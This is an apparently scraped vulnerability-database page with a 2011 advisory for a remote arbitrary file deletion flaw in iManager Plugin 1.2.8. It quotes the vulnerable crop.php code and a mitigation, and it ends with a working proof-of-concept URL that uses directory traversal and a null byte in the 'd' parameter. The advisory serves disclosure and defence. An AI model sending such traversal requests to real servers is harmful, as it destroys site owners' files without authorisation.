header-logo
Suggest Exploit
vendor:
iManager Plugin
by:
Gjoko 'LiquidWorm' Krstic
7.5
CVSS
HIGH
Remote Arbitrary File Deletion
22
CWE
Product Name: iManager Plugin
Affected Version From: <= 1.2.8 Build 02012008
Affected Version To: <= 1.2.8 Build 02012008
Patch Exists: YES
Related CWE: N/A
CPE: a:net4visions.com:imanager_plugin:1.2.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3 (EN), Apache 2.2.14 (Win32), PHP 5.3.1, MySQL 5.1.41
2011

iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability

Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the 'd' parameter.

Mitigation:

Input validation should be performed to ensure that untrusted input is not used to delete files.
Source

Exploit-DB raw data:

iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability


Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.2.8 Build 02012008

Summary: With iManager you can manage your files/images on your webserver,
and it provides user interface to most of the phpThumb() functions. It works
either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,
htmlAREA, Xinha and FCKeditor.

Desc: Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is not
properly sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server via directory traversal
sequences passed within the 'd' parameter.


======================================================================
/scripts/phpCrop/crop.php:
----------------------------------------------------------------------

32: if( isset($_REQUEST['s']) ) {
33:     //delete previous temp files		
34:     $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE);		
35:     if ( is_array ( $matches ) ) {
36:          foreach ( $matches as $fn) {
37:               @unlink($fn);	
38:          }
39: }

======================================================================


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com


Advisory ID: ZSL-2011-5043
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php


15.09.2011

--


http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00